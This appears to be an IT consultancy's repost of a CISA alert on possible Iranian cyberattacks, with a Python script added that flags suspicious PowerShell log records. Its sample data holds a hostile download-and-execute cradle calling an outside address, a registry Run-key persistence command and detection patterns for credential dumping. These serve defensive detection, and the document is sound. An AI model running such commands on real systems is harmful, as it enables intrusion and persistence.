Alert (AA20-006A) Potential for Iranian Cyber Response to U.S. Military Strike in Baghdad

Your Trusted Digital Transformation Partner

As we are all connected with Systems and Platforms to the world, we have to
appreciate the tools being used are not all specific and our data can be
affected; please see below the latest Cyber Alert and ensure you take the
necessary precautions to safeguard Data, as we in the Caribbean are NOT immune
to these worldwide cyber threats.

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is sharing the
following information with the cybersecurity community as a primer for
assisting in the protection of our Nation’s critical infrastructure in light of
the current tensions between the Islamic Republic of Iran and the United States
and Iran’s historic use of cyber offensive activities to retaliate against
perceived harm. Foremost, CISA recommends organizations take the following
actions:

  1. Adopt a state of heightened awareness. This includes
    minimizing coverage gaps in personnel availability, more consistently
    consuming relevant threat intelligence, and making sure emergency call
    trees are up to date.
  2. Increase organizational vigilance. Ensure
    security personnel are monitoring key internal security capabilities and
    that they know how to identify anomalous behavior. Flag any known Iranian
    indicators of compromise and tactics, techniques, and procedures (TTPs)
    for immediate response.
  3. Confirm reporting processes. Ensure
    personnel know how and when to report an incident.  
  4. Exercise organizational incident response plans. Ensure
    personnel are familiar with the key steps they need to take during an
    incident. Do they have the accesses they need? Do they know the processes?
    Are your various data sources logging as expected? Ensure personnel are
    positioned to act in a calm and unified manner.

Technical Details

Iranian Cyber Threat Profile

Iran has a history of leveraging asymmetric tactics to pursue national
interests beyond its conventional capabilities. More recently, its use of
offensive cyber operations is an extension of that doctrine. Iran has exercised
its increasingly sophisticated capabilities to suppress both social and
political perspectives deemed dangerous to Iran and to harm regional and
international opponents.

Iranian cyber threat actors have continuously improved their offensive
cyber capabilities. They continue to engage in more “conventional” activities
ranging from website defacement, distributed denial of service (DDoS) attacks,
and theft of personally identifiable information (PII), but they have also
demonstrated a willingness to push the boundaries of their activities, which
include destructive wiper malware and, potentially, cyber-enabled kinetic
attacks.

The U.S. intelligence community and various private sector threat
intelligence organizations have identified the Islamic Revolutionary Guard
Corps (IRGC) as a driving force behind Iranian state-sponsored cyberattacks,
either through contractors in the Iranian private sector or by the IRGC
itself.

Iranian Cyber Activity

According to open-source information, offensive cyber operations targeting
a variety of industries and organizations—including financial services, energy,
government facilities, chemical, healthcare, critical manufacturing,
communications, and the defense industrial base—have been attributed, or
allegedly attributed, to the Iranian government. The same reporting has
associated Iranian actors with a range of high-profile attacks, including the
following:

  • Late 2011 to Mid-2013 – DDoS Targeting U.S. Financial Sector: In
    response to this activity, in March 2016, the U.S. Department of Justice
    indicted seven Iranian actors employed by companies performing work on
    behalf of the IRGC for conducting DDoS attacks primarily targeting the
    public-facing websites of U.S. banks. The attacks prevented customers from
    accessing their accounts and cost the banks millions of dollars in
    remediation.
  • August/September 2013 – Unauthorized Access to Dam in New York State: In
    response, in March 2016, the U.S. Department of Justice indicted one
    Iranian actor employed by a company performing work on behalf of the IRGC
    for illegally accessing the supervisory control and data acquisition
    (SCADA) systems of the Bowman Dam in Rye, New York. The access allowed the
    actor to obtain information regarding the status and operation of the dam.
  • February 2014 – Sands Las Vegas Corporation Hacked: Cyber threat actors
    hacked into the Sands Las Vegas Corporation in Las Vegas, Nevada, and
    stole customer data, including credit card data, Social Security Numbers,
    and driver’s license numbers. According to a Bloomberg article from
    December 2014, the attack also involved a destructive portion, in which
    the Sands Las Vegas Corporation’s computer systems were wiped. In
    September 2015, the U.S. Director of National Intelligence identified the
    Iranian government as the perpetrator of the attack in a Statement for the
    Record to the House Permanent Select Committee on Intelligence.
  • 2013 to 2017 – Cyber Theft Campaign on Behalf of IRGC: In response, in
    March 2018, the U.S. Justice Department indicted nine Iranian actors
    associated with the Mabna Institute for conducting a massive cyber theft
    campaign containing dozens of individual incidents, including “many on
    behalf of the IRGC.” The thefts targeted academic and intellectual
    property data as well as email account credentials. According to the
    indictment, the campaign targeted “144 U.S. universities, 176 universities
    across 21 foreign countries, 47 domestic and foreign private sector
    companies, the U.S. Department of Labor, the Federal Energy Regulatory
    Commission, the State of Hawaii, the State of Indiana, the United Nations,
    and the United Nations Children’s Fund.”

Mitigations

Recommended Actions

The following is a composite of actionable technical recommendations for IT
professionals and providers to reduce their overall vulnerability. These
recommendations are not exhaustive; rather they focus on the actions that will
likely have the highest return on investment. In general, CISA recommends two
courses of action in the face of potential threat from Iranian actors: 1)
vulnerability mitigation and 2) incident preparation.

  1. Disable all unnecessary ports and protocols. Review
    network security device logs and determine whether to shut off unnecessary
    ports and protocols. Monitor common ports and protocols for command and
    control activity.
  2. Enhance monitoring of network and email traffic. Review
    network signatures and indicators for focused operations activities,
    monitor for new phishing themes and adjust email rules accordingly, and
    follow best practices of restricting attachments via email or other
    mechanisms.  
  3. Patch externally facing equipment. Focus on
    patching critical and high vulnerabilities that allow for remote code
    execution or denial of service on externally facing equipment.
  4. Log and limit usage of PowerShell. Limit the
    usage of PowerShell to only users and accounts that need it, enable code
    signing of PowerShell scripts, and enable logging of all PowerShell
    commands.
  5. Ensure backups are up to date and
    stored in an easily retrievable location that is air-gapped from the
    organizational network.

Patterns of Publicly Known Iranian Advanced Persistent Threats

The following mitigations and detection recommendations regarding publicly
known Iranian advanced persistent threat (APT) techniques are based on
the MITRE ATT&CK Framework.  

Iranian APT Techniques

  • Credential Dumping
  • Obfuscated Files or Information
  • Data Compressed
  • PowerShell
  • User Execution
  • Scripting
  • Registry Run Keys/Startup Folder
  • Remote File Copy
  • Spearphishing
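The recommendation to log all PowerShell commands is only useful if someone
reads the logs. The script below is an added example, not part of the CISA
alert or any CISA tooling: it triages PowerShell-related log records against
the technique names in the list above (PowerShell, Obfuscated Files or
Information, Scripting, Remote File Copy, Registry Run Keys/Startup Folder,
Data Compressed, Credential Dumping). The log records are constructed to
resemble command lines and script-block text that PowerShell logging would
capture, and the regular expressions are illustrative assumptions rather than
a vetted signature set; the -EncodedCommand handling (base64 of UTF-16LE) is
how PowerShell actually encodes that argument.

```python
"""Triage PowerShell-related log records against the technique names in the
alert.  Added example, not CISA code; records are constructed and the
patterns are assumptions chosen for illustration."""
import base64
import re

# Technique names come from the alert's "Iranian APT Techniques" list; the
# regexes are assumed indicators, not a complete detection ruleset.
RULES = [
    ("PowerShell",
     re.compile(r"powershell(?:\.exe)?\s.*-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?)", re.I)),
    ("Scripting", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("Remote File Copy",
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I)),
    ("Registry Run Keys/Startup Folder",
     re.compile(r"CurrentVersion\\Run\b|\\Startup\\", re.I)),
    ("Data Compressed",
     re.compile(r"Compress-Archive|\b7z(?:a|\.exe)?\s+a\b|\brar(?:\.exe)?\s+a\b", re.I)),
    ("Credential Dumping", re.compile(r"sekurlsa|lsass", re.I)),
]

# -EncodedCommand payloads are base64 of UTF-16LE text; this picks the
# payload out of a command line (longest switch spelling tried first).
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(text):
    """Return the decoded script from an -EncodedCommand argument, or None."""
    match = ENCODED_RE.search(text)
    if match is None:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: fall back to matching the raw text


def classify(text):
    """Return the sorted technique names a single record matches."""
    techniques = set()
    decoded = decode_encoded_command(text)
    if decoded is not None:
        # An encoded command line is itself "Obfuscated Files or Information";
        # the decoded body is appended so the other rules see it too.
        techniques.add("Obfuscated Files or Information")
        text = text + "\n" + decoded
    for name, pattern in RULES:
        if pattern.search(text):
            techniques.add(name)
    return sorted(techniques)


def triage(records):
    """Return (host, user, techniques) for every record that matched a rule."""
    hits = []
    for host, user, text in records:
        techniques = classify(text)
        if techniques:
            hits.append((host, user, techniques))
    return hits


def encode_command(script):
    """Build an -EncodedCommand payload the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records: (host, user, command line or script block text).
# Hosts, users and paths are made up; 198.51.100.7 is a documentation address.
SAMPLE_RECORDS = [
    ("WS01", "CORP\\alice", "Get-ChildItem C:\\Reports | Measure-Object"),
    ("WS02", "CORP\\bob", "powershell.exe -NoP -W Hidden -EncodedCommand "
     + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")),
    ("WS03", "CORP\\carol", "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows"
     "\\CurrentVersion\\Run' -Name Updater -Value 'C:\\Users\\Public\\u.exe'"),
    ("WS04", "CORP\\dave", "Compress-Archive -Path C:\\Users\\dave\\Documents "
     "-DestinationPath C:\\Users\\Public\\docs.zip"),
]

if __name__ == "__main__":
    for host, user, techniques in triage(SAMPLE_RECORDS):
        print(f"{host} {user}: {', '.join(techniques)}")
```

Run as-is it reports WS02 (encoded, hidden-window download cradle), WS03
(Run key persistence) and WS04 (archive creation) and stays silent on the
benign WS01 record. In a real deployment the records would come from the
PowerShell Operational log (Event ID 4104 script blocks) and process-creation
events, and the rule list would be tuned against the organization's own
administrative scripts to keep false positives down.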

More Information – Mitigation and Detection Techniques:

https://www.us-cert.gov/ncas/alerts/aa20-006a

Contact us at any time: www.cttl.net | transform@cttl.net | 1-868-678-2885
(CTTL)

D.M.Ramdathsingh MSc, PgD – UK & Singapore
Chief Solutions Architect (CSA) – West Indies
Microsoft Certified Azure Security Engineer
Fortinet NSE 7 – Certified Network Security Architect
MILE2 – Certified Disaster / Penetration Testing Engineer
CTTL Ltd (CTTL)